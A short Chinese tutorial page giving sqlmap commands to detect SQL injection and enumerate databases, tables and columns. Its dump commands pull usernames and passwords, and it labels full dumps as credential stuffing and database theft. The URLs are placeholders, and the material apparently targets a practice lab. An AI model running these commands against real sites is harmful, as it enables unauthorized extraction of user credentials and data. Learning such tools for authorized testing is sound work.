Java教程

1.21 SQLmap工具使用

本文主要是介绍1.21 SQLmap工具使用,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

设置sqlmap线程(扫描速率,范围1-10) --thread

kali端

1.判断网站是否存在注入

get类型sqlmap -u "url">检测url中是否存在注入点,如果没有注入点则运行不出来

post类型sqlmap -r 请求数据包.txt> 使用抓到的数据包文本进行检测注入

2.爆出数据库

爆出当前数据库sqlmap -u "url" --current-db --thread 10 >使用10线程

爆出网站内所有数据库sqlmap -u "url" --dbs --thread 10

3.爆出表

指出security数据库名-D security爆出所有的表--tables

爆出security数据库中所有表的数据 

sqlmap -u "url" -D security --tables--dump>撞库

爆出security数据库中所有数据 

sqlmap -u "url"  --dump-all>脱库

4.爆出列

sqlmap -u " url" -D security -T users --columns>爆出指定数据库下面指定表的所有列

5.爆出列中所有字段内容

爆出-C指定列的内容

sqlmap -u "url" -D security -T users -C id,password,username --dump

这篇关于1.21 SQLmap工具使用的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!